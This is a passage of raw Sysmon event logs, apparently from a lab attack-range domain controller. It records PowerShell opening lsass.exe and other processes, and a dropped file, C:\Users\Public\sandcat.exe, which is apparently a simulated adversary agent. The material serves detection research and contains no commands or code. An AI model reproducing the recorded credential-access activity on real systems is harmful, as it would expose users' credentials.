00007FF828DC3F41) 10341000x80000000000000001112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E46-6005-1300-00000000A301}1280C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-2100-00000000A301}2444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1F00-00000000A301}2300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1C00-00000000A301}2164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.705{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1A00-00000000A301}2148C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 10341000x80000000000000001104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.689{59A5CD1D-8E46-6005-1800-00000000A301}20842796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E47-6005-1E00-00000000A301}2292C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b335c|UNKNOWN(00007FF828DC3F41) 11241100x80000000000000001103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:34:02.455{59A5CD1D-8E47-6005-1900-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2021-01-18 13:32:43.210 10341000x80000000000000001102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.158{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.158{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.158{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.158{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.158{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.096{59A5CD1D-8E46-6005-1600-00000000A301}15442428C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51
791 10341000x80000000000000001096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.080{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.080{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.064{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E4A-6005-2200-00000000A301}2816C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.064{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.064{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.064{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:02.064{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:02.064{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:02.002{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\PortKeywords\Teredo\CollectionBinary Data 10341000x80000000000000001087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:01.986{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:01.908{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E47-6005-1B00-00000000A301}2156C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\